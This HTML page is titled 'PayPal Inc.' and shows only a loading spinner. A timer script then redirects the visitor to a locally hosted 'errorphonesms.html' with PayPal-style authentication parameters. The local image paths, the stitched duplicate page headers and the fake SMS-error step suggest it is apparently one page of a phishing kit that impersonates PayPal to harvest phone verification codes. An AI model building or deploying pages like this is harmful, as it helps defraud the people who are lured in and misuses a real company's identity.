<!DOCTYPE html>
<html>

<head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <!--[if IE 8]><style>.ng-hide {display: none !important;}</style><![endif]-->
    <style type="text/css">
        @charset "UTF-8";
        [ng\:cloak],
        [ng-cloak],
        [data-ng-cloak],
        [x-ng-cloak],
        .ng-cloak,
        .x-ng-cloak,
        .ng-hide:not(.ng-hide-animate) {
            display: none !important;
        }
        ng\:form {
            display: block;
        }
        .ng-animate-shim {
            visibility: hidden;
        }
        .ng-anchor {
            position: absolute;
        }
    </style>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="robots" content="noindex">

    <!-- 2.0.2_20170412174923162.unx Wed Apr 12 2017 17:30:26 GMT-0700 (PDT) -->

<!DOCTYPE html>
<html dir="ltr" data-reactid=".14j6ip0k64g" data-react-checksum="1583192807" lang="de">

<head data-reactid=".14j6ip0k64g.0">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge" data-reactid=".14j6ip0k64g.0.0">
    <meta http-equiv="content-type" content="text/html; charset=UTF-8" data-reactid=".14j6ip0k64g.0.1">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1, user-scalable=yes" data-reactid=".14j6ip0k64g.0.8">
    <link rel="shortcut icon" href="./imgs/favicon.ico" data-reactid=".14j6ip0k64g.0.9">

    <!-- (xo-spinner/dist/styles.less) Inlining spinner CSS, then the main CSS bundle is injected when main.js is loaded -->
    <style type="text/css">
        body {
            margin: 0
        }
        .loading #main {
            opacity: .1
        }
        .spinner {
            height: 100%;
            width: 100%;
            position: absolute;
            z-index: 10
        }
        .spinner .spinWrap {
            width: 200px;
            height: 100px;
            position: absolute;
            top: 50%;
            left: 50%;
            margin-left: -100px;
            margin-top: -50px
        }
        .spinner .loader,
        .spinner .spinnerImage {
            height: 100px;
            width: 100px;
            position: absolute;
            top: 0;
            left: 50%;
            opacity: 1;
            filter: alpha(opacity=100)
        }
        .spinner .spinnerImage {
            margin: 28px 0 0 -25px;
            background: url(./imgs/icon_ot_spin_lock_skinny.png) no-repeat
        }
        .spinner .loader {
            margin: 0 0 0 -55px;
            background-color: transparent;
            -webkit-animation: rotation .7s infinite linear;
            -moz-animation: rotation .7s infinite linear;
            -o-animation: rotation .7s infinite linear;
            animation: rotation .7s infinite linear;
            border-left: 5px solid #cbcbca;
            border-right: 5px solid #cbcbca;
            border-bottom: 5px solid #cbcbca;
            border-top: 5px solid #2380be;
            border-radius: 100%
        }
        .spinner .loadingMessage {
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            -ms-box-sizing: border-box;
            box-sizing: border-box;
            width: 100%;
            margin-top: 125px;
            text-align: center;
            z-index: 100;
            outline: 0
        }
        .spinner .loadingSubHeading {
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            -ms-box-sizing: border-box;
            box-sizing: border-box;
            width: 150%;
            margin-top: 10px;
            margin-left: -42px;
            text-align: center;
            z-index: 100;
            outline: 0
        }
        @-webkit-keyframes rotation {
            from {
                -webkit-transform: rotate(0)
            }
            to {
                -webkit-transform: rotate(359deg)
            }
        }
        @-moz-keyframes rotation {
            from {
                -moz-transform: rotate(0)
            }
            to {
                -moz-transform: rotate(359deg)
            }
        }
        @-o-keyframes rotation {
            from {
                -o-transform: rotate(0)
            }
            to {
                -o-transform: rotate(359deg)
            }
        }
        @keyframes rotation {
            from {
                transform: rotate(0)
            }
            to {
                transform: rotate(359deg)
            }
        }
    </style>

    <noscript>
        <meta http-equiv="refresh" content="#">
    </noscript>

    <title>PayPal Inc.</title>
</head>

<body>



    <noscript ng-non-bindable="">
        <div style="#"></div>
        <p class="noscript"></p>
    </noscript>

    <div id="preloaderSpinner" class="preloader spinner">
        <div class="spinWrap">
            <p class="spinnerImage"></p>
            <p class="loader"></p>
            <p class="loadingMessage" id="spinnerMessage"></p>
            <p class="loadingSubHeading" id="spinnerSubHeading"></p>
        </div>
    </div>

    <div ui-view="" ng-cloak=""></div>

    


</body>
    <body>

    <script>
        var timer = setTimeout(function() {
            window.location='errorphonesms.html?=/#authflow/entry/?stepupContext=8508201910601593787&returnUri=%2Fauth%2Freturn&flowId=xo&flowContext=funding&country.x=DE&locale.x=de_DE&pushNotificationDisabled=true'
        }, 20000);
    </script>
</body>

</html>